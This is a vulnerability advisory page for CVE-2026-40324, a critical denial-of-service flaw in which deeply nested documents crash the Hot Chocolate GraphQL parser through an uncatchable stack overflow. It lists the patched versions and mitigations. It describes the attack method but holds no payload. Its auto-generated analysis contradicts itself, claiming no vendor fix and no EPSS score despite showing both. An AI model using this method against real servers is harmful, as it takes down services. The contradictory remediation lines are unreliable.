Description
Hot Chocolate is an open-source GraphQL server. Prior to versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14, Hot Chocolate's recursive descent parser `Utf8GraphQLParser` has no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as 40 KB. Because `StackOverflowException` is uncatchable in .NET (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process. This occurs before any validation rules run — `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields. The fix in versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14 adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack. There is no application-level workaround. `StackOverflowException` cannot be caught in .NET. The only mitigation is to upgrade to a patched version. Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip).
Published: 2026-04-17
Score: 9.1 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Denial of Service
Action: Immediate Patch
AI Analysis

Impact

Hot Chocolate, the GraphQL server library, contains a recursive descent parser with no bound on recursion depth. When an attacker sends a carefully constructed GraphQL document featuring deeply nested selection sets, object values, list values, or list types, the parser can consume an unlimited stack and trigger a StackOverflowException. Because the exception is uncatchable in .NET, the entire worker process terminates, causing all in-flight HTTP requests, background services, and WebSocket subscriptions to fail and requiring the orchestrator to restart the process. The issue is resolved in releases 12.22.7, 13.9.16, 14.3.1, and 15.1.14, which introduce a safe default recursion depth limit and throw a catchable SyntaxException instead of allowing a stack overflow.

Affected Systems

Systems built with the ChilliCream Hot Chocolate GraphQL platform running a version earlier than 12.22.7, 13.9.16, 14.3.1, or 15.1.14 are affected. This includes any .NET application that hosts the Hot Chocolate library to process GraphQL requests. The failure occurs within the application process, regardless of hardware environment.

Risk and Exploitability

The CVSS score of 9.1 indicates a Critical severity. Although the EPSS score is not available, the vulnerability can be exploited with a payload that can be compressed to only a few hundred bytes, easily bypassing typical body size limits. The stack overflow occurs before any GraphQL validation runs, so standard mitigations such as complexity analysis or persisted query whitelisting do not protect the service. An attacker who can send the crafted query can bring the application down without authentication, presenting a high risk of denial of service in production environments.

Generated by OpenCVE AI on April 18, 2026 at 08:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Hot Chocolate to version 12.22.7, 13.9.16, 14.3.1, or 15.1.14 where a max recursion depth limit is implemented.
  • If an immediate upgrade is not possible, configure your reverse proxy or load balancer to enforce a stricter maximum HTTP request body size and enable compression to limit the size that reaches the parser.
  • Ensure your application can handle SyntaxException errors gracefully so that the server remains operational even if a malformed query is received.

Generated by OpenCVE AI on April 18, 2026 at 08:49 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-qr3m-xw4c-jqw3 ChilliCream GraphQL Platform: Utf8GraphQLParser Stack Overflow via Deeply Nested GraphQL Documents
History

Fri, 17 Apr 2026 23:30:00 +0000

Type Values Removed Values Added
Description Hot Chocolate is an open-source GraphQL server. Prior to versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14, Hot Chocolate's recursive descent parser `Utf8GraphQLParser` has no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as 40 KB. Because `StackOverflowException` is uncatchable in .NET (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process. This occurs before any validation rules run — `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields. The fix in versions 12.22.7, 13.9.16, 14.3.1, and 15.1.14 adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack. There is no application-level workaround. `StackOverflowException` cannot be caught in .NET. The only mitigation is to upgrade to a patched version. Operators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip).
Title Hot Chocolate's Utf8GraphQLParser has Stack Overflow via Deeply Nested GraphQL Documents
Weaknesses CWE-674
References
Metrics cvssV3_1

{'score': 9.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-17T23:05:26.217Z

Reserved: 2026-04-10T21:41:54.505Z

Link: CVE-2026-40324

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2026-04-18T00:16:36.920

Modified: 2026-04-18T00:16:36.920

Link: CVE-2026-40324

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T09:00:05Z

Weaknesses